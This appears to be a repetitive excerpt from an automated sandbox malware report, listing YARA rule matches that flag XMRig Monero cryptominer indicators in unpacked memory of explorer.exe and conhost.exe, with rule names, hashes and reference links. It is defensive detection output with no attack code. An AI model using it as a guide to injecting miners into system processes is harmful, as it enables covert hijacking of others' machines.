              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
